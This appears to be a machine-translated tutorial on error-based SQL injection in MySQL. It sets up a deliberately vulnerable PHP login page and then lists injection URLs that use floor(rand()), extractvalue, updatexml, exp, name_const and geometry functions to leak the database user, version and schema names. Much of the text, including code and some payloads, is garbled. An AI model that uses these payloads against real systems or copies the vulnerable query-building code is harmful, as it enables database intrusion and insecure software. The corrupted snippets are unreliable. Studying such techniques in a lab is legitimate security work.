Error injection principle: Due to the conflict between Rand and Group+by, rand () is not a conditional field for order by, nor can it be a conditional field for group by. Floor (rand (0) * *) gets an indeterminate and duplicate value resulting in MySQL error floor: Rounding down, preserving only integral parts, rand (0)-0~1 Local Environment build database test injection posture:
Mysql> Create DatabaseSqli;mysql> Create Table User(IDint( One) not NULLAuto_incrementPrimary Key, namevarchar( -) not NULL, passvarchar( +) not NULL ); MySQL> Insert into User(Name, pass)Values('Admin', MD5 ('admin888')), ('Guest', MD5 ('Guest'));
The following files are created at the site root: index.php
<? php$conn=mysql_connect ("localhost", "root", "root");//connection database, account root, password rootif(! $conn) {die ("Connection failed:". Mysql_error ());} mysql_select_db ("Sqli", $conn);//Verify Login Infoif(Isset ($_get[' name '])&&Isset ($_get[' Pass ']) {$name=$_get[' name ']; $pass=MD5 ($_get[' Pass ']); $query="Select * from User whereName='$name' andPass='$pass'"; if($result=mysql_query ($query, $conn)) {$row=mysql_fetch_array ($result, MYSQL_ASSOC); if($row) {echo '<Script>Alert'Login successful!');</Script>"; } } Else{die ("Operation error:".) Mysql_error ()); }}mysql_close ();?><! DOCTYPE html><Html><Head> <Title>Login</Title></Head><Body><Center> <Form method="Get" action=""> <Label>Username:</Label><input type="text"Name="Name" value=""/><Br/> <Label>Password:</Label><input type="Password" name="Pass" value=""/><Br/> <input type="Submit" value="Login"/> </Form></Center></Body></Html>
Index.php's PHP Verification login code is simple:
$name=$_get[' name ']; $pass=MD5 ($_get[' Pass ']); $query="Select * from User whereName='$name' andPass='$pass'";
$name parameter is an obvious injection point.
1, through Floor () Error:
http://localhost/index. Php?name='+or+ (Select+1+from (select+ Count (*), concat (User (), 0x7e,floor (rand (0))) x+from+information_schema.tables+group+by+x) a) +%23&pass=1
# Burst database: Replace the keyword with the one you want to query
http://localhost/index. Php?name='+or+ (select 1 from (SELECT Count (*), Concat ((select (SELECT DISTINCT concat (0x7e,schema_name,0x7e) from Information_schema.schemata LIMIT 0,1)) From Information_schema.tables limit 0,1), floor (rand (0) *) x from Information_schema.tables Group by X) a) +%23&pass =1
2, through Extractvalue () Error:
http://localhost/index. Php?name='+or+extractvalue (1, Concat (User (), 0x7e,version ())) +%23&pass=1
3, through Updatexml () Error:
http://localhost/index. Php?name='+or+updatexml (1,concat (User ( ), 0x7e,version ()), 1) +%23&pass=1
4, through exp () Error: In detail, see: https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/
http://localhost/index. Php?name='+or+exp (~ (SELECT * FROM ( Select User ()) a) +%23&pass=1
5, through the Name_const (for the lower version) error:
http://localhost/index. Php?name='+or+ (SELECT * FROM (select Name_ CONST (Version (), 1), Name_const (version (), 1)) as X) +%23&pass=1
6, through Multipoint (), Multipolygon (), multilinestring (), linestring (), geometrycollection (), Polygon () and other functions of the error:
http//localhost/Index. php?name='+or+multipoint ((SELECT * FROM (SELECT * () () a) b) +%23&pass=1http://localhost/index.php?name= '+or+Multipolygon ((Select * from(Select * from(Select Database()) a) (b))+% at&Pass=1http://localhost/Index. php?name='+or+multilinestring ((SELECT * FROM (select User () a) b)) +%23&pass=1http://localhost/index.php? Name='+or+LINESTRING ((Select * from(Select * from(Select User()) a) (b))+% at&Pass=1http://localhost/Index. php?name='+or+geometrycollection ((SELECT * FROM (SELECT * () () a) b) +%23&pass=1http://localhost/ Index.php?name='+or+Polygon ((Select * from(Select * from(Select User()) a) (b))+% at&Pass=1
SQL error injection of more than 10 kinds of injection methods